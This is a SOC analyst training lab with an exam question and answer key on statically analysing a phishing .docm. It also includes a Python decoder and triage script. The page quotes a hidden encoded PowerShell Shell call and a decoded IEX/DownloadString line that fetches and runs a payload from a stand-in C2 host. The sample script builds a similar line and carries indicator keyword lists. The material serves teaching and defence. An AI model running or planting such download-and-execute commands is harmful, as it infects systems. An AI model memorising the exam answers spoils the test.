CSA (312-39) SOC Simulation Lab

Learn how to safely inspect malicious documents and extract obfuscated PowerShell scripts without detonating the payload in your environment.

Scenario Context

You are a Tier 3 SOC Analyst investigating a phishing campaign. A user in the HR department (hr-wks-044) reported a suspicious email attachment named Q3_Bonus_Adjustments.docm. The local EDR flagged the file upon download but did not quarantine it due to a misconfigured policy path.

You have acquired the file and placed it in your isolated REMnux analysis VM. You need to identify the exact Command and Control (C2) domains the script is attempting to contact, but the malware is known to be sandbox-evasive (it will not execute if it detects a virtualized environment).

Security Environment

Instead of double-clicking the file, you use the Python tool oledump.py to inspect the OLE streams within the document structure.

remnux@soc-lab:~$ oledump.py Q3_Bonus_Adjustments.docm
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 7041 '1Table'
5: 441 'Macros/PROJECT'
6: 65 'Macros/PROJECTwm'
7: M 2304 'Macros/VBA/ThisDocument'

remnux@soc-lab:~$ oledump.py -s 7 -v Q3_Bonus_Adjustments.docm | grep -i shell
Shell("powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBl...")

You successfully extract the Base64 encoded PowerShell string. You now need to decode it to read the logic.

Question

The SOC team found a suspicious document file on a user's workstation. Upon initial inspection, the document appears benign, but deeper analysis reveals an embedded PowerShell script. The team suspects the script is designed to download and execute a malicious payload. They need to understand the script's functionality without triggering it. Which malware analysis technique would be recommended for the SOC team to understand the PowerShell script's functionality without executing it?
A. Static analysis
B. Network traffic analysis
C. Dynamic analysis
D. Automated behavioral analysis
SOC Hint: The key constraint in the scenario is "without triggering it". Which analysis method relies entirely on reverse engineering, code inspection, and decoding files at rest?

Expert Insight

1. What is happening?

The adversary is utilizing a weaponized Microsoft Office document (MITRE ATT&CK T1566.001) containing malicious VBA macros. Once a user enables content, the macro uses the Shell command to spawn a Living-off-the-Land (LotL) attack via PowerShell. To evade basic signature detection, the PowerShell payload is Base64 encoded (-enc).

2. Why A is correct

Static analysis is the process of examining malware without running it. By using tools like oledump.py, strings, or CyberChef to extract and decode the Base64 script, the SOC analyst can read the exact URLs, C2 IP addresses, and file paths the script intends to use. This satisfies the requirement to understand functionality without detonating the payload and risking infection.

3. Why the others are wrong

  • B. Network traffic analysis: Requires the malware to be executed so it can generate the network traffic (beaconing or downloading) you intend to capture via PCAP.
  • C. Dynamic analysis: The literal opposite of what is requested. Dynamic analysis requires detonating the malware in a controlled environment (sandbox) to observe its behavior (process creation, registry changes).
  • D. Automated behavioral analysis: This is a form of dynamic analysis (like submitting to Any.Run, Cuckoo, or Joe Sandbox). It executes the file to trace its API calls and behavior.

4. Real-world SOC Application

While dynamic analysis (sandboxing) is fast, modern malware often contains "anti-analysis" or "anti-VM" checks. For example, a script might check if the system domain is WORKGROUP or if the CPU core count is less than 4. If these checks fail, the malware simply exits, and your dynamic analysis yields zero C2 Indicators of Compromise (IOCs). By manually performing static analysis, a senior analyst bypasses these evasion techniques to extract the hardcoded IOCs directly from the script.

MINI LESSON: Decoding Base64 PowerShell Statically

When you encounter a powershell -enc payload, the string is Base64-encoded Unicode (UTF-16LE), not standard ASCII. You can decode it statically, without running the malicious code, using native PowerShell or CyberChef.

# Safe static decoding using PowerShell (does not execute the malicious payload)
# $b64 holds the -enc argument extracted from stream 7 above
PS C:\> $b64 = "JABzAD0ATgBlAHcALQBPAGIAagBl..."
PS C:\> [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64))

# Output reveals the hidden C2 logic:
$s=New-Object IO.MemoryStream(...); IEX (New-Object Net.WebClient).DownloadString('http://evil-c2.com/payload.ps1')

Pro-Tip for ExamRange users: Always map decoded scripts back to MITRE ATT&CK. The IEX (Invoke-Expression) combined with DownloadString is a classic indicator of T1059.001 (Command and Scripting Interpreter: PowerShell).
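Added example, not part of this lab or its tooling: a Python script for the REMnux VM that performs the same static decoding step (Base64 over UTF-16LE) and then triages the decoded text for the indicators discussed above: URLs, IEX/DownloadString, the anti-VM checks mentioned in the Real-world SOC Application section, and the T1059.001 mapping from the pro-tip. The sample payload and its domain c2.example.invalid are constructed placeholders, and the indicator lists are assumptions for the example, not a complete signature set.

```python
import base64
import re

# Constructed sample (not from the lab or any real campaign): the one-liner a
# macro might pass to "powershell -enc", encoded the way PowerShell expects
# (UTF-16LE text, then Base64). The domain is a placeholder.
SAMPLE_SCRIPT = (
    "$s=New-Object IO.MemoryStream; "
    "if((Get-WmiObject Win32_ComputerSystem).Domain -eq 'WORKGROUP'){exit}; "
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/payload.ps1')"
)
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Indicators to look for in the decoded text. These lists are assumptions for
# the example, not an exhaustive signature set.
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[^\s'\"()]*)?", re.IGNORECASE)
EXEC_PRIMITIVES = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile", "Start-Process")
ANTI_ANALYSIS = ("WORKGROUP", "NumberOfProcessors", "NumberOfLogicalProcessors", "VirtualBox", "VMware")


def decode_enc_payload(b64: str) -> str:
    """Decode a `powershell -enc` argument without executing it.

    -enc payloads are Base64 over UTF-16LE. Strings copied out of oledump or a
    ticket are often truncated ("...") or missing '=' padding, so the function
    drops non-Base64 characters, restores padding, and discards a trailing
    half code unit instead of failing.
    """
    cleaned = re.sub(r"[^A-Za-z0-9+/]", "", b64)
    cleaned += "=" * (-len(cleaned) % 4)
    raw = base64.b64decode(cleaned)
    raw = raw[: len(raw) - (len(raw) % 2)]  # UTF-16LE code units are 2 bytes
    return raw.decode("utf-16-le", errors="replace")


def triage(decoded: str) -> dict:
    """Static triage of the decoded script: network IOCs, execution primitives,
    anti-analysis checks, and the ATT&CK technique the lab maps IEX+DownloadString to."""
    def found(needle: str):
        return re.search(r"\b" + re.escape(needle) + r"\b", decoded, re.IGNORECASE)

    exec_hits = [p for p in EXEC_PRIMITIVES if found(p)]
    return {
        "urls": URL_RE.findall(decoded),
        "exec_primitives": exec_hits,
        "anti_analysis": [a for a in ANTI_ANALYSIS if found(a)],
        "attack_techniques": ["T1059.001"] if exec_hits else [],
    }


if __name__ == "__main__":
    script = decode_enc_payload(SAMPLE_ENC)
    print(script)
    for key, value in triage(script).items():
        print(f"{key}: {value}")
```

Because the decoded text is only ever handled as a string, nothing in it is executed. The decoder also tolerates the truncated "..." form shown in the oledump output above and returns the decodable prefix, which is usually enough to confirm the payload family before you go back for the full stream.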
